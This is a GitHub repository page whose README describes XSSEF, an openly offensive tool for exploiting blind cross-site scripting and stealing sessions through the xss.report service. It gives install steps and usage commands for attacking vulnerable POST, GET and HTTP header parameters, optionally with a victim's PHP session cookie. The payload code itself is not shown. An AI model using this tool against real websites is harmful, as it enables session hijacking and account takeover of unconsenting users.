Skip to content
/ XSSEF Public

https://xss.report Blind Cross Site Scripting Vulnerability Exploitation Framework

License

GPL-3.0 license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Sakintiklama/XSSEF

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
attacks_lib.py
attacks_lib.py
 
 
helperfuncs_lib.py
helperfuncs_lib.py
 
 
xssef.py
xssef.py
 
 

Repository files navigation

XSSEF

Blind Cross Site Scripting Vulnerability Exploitation Freamwork Authenticated & Unauthenticated POST,GET,HTTPHEADER xss exploitation & session stealing freamwork. In order to use it, you must be registered to the Freamwork System (xss.report)

It is for educational purposes only. In case of abuse, the user is responsible.

1)- USAGE BOOK

2)- REQUIREMENTS

3)- DOWNLOAD AND INSTALLATION

4)- PARAMETHERS AND WORKS

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

DOWNLOAD & INSTALLATION

$ git clone https://github.com/ringzerofy/XSSEF.git
$ cd XSSEF-master
$ chmod 777 * (Linux)
$ python xssef.py --help

PARAMETHERS & WORKS

--user [-u] -> Freamwork Usrname
--target [-t]  -> (VULNERABLE) TARGET URL

--post [-p] -> VULNERABLE POST PARAMETHER
--get [-g] -> VULNERABLE GET PARAMETHER
--cookie [-c] -> COOKI FOR AUTHENTICATIONS (FOR AUTHENTICATED VULNERABILITIES)

REQUIREMENTS

Python Version >= 3.0

$pip install -m requests
$pip install -m argparse

XXSEF Freamwork Account

USAGE BOOK

[POST] PARAMETHER EXPLOITATION

Unauthenticated POST Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -p [VULNERABLE POST PARAMETHER]

Authenticated POST Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -p [VULNERABLE POST PARAMETHER] -c [PHPSESSION ID FOR AUTHENTICATION]

[GET] PARAMETHER EXPLOITATION

Unauthenticated GET Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -g [VULNERABLE GET PARAMETHER]

Authenticated GET Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -g [VULNERABLE GET PARAMETHER] -c [PHPSESSION ID FOR AUTHENTICATION]

[HTTP HEADER] PARAMETHER EXPLOITATION

Unauthenticated HTTP HEADER Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME]

Authenticated HTTP HEADER Value Exploitation :

$ python xssef.py -t [TARGET URL] -u [FREAMWORK USERNAME] -c [PHPSESSION ID FOR AUTHENTICATION]

About

https://xss.report Blind Cross Site Scripting Vulnerability Exploitation Framework

Resources

Readme

License

GPL-3.0 license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages